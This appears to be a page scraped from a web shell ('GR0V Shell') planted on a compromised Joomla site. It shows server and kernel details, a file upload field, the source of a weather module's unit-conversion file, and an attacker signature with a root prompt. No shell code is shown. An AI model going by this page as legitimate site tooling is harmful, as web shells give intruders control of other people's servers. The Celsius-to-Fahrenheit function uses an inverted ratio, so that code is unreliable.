? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/modules/mod_gk_weather/
File Upload :
Current File : /home/admin/public_html/old/modules/mod_gk_weather/units.php

<?php

/**
* Gavick GK Weather - units functions
* @package Joomla!
* @Copyright (C) 2009 Gavick.com
* @ All rights reserved
* @ Joomla! is Free Software
* @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html
* @version $Revision: 1.0.0 $
**/

function Cel2F($value)
{
	return floor(32 + ((5/9) * $value)).'&deg;F';
}

function F2Cel($value)
{
	return floor((5/9) * ($value - 32)).'&deg;C';
}

?>

T1KUS90T
  root-grov@210.1.60.28:~$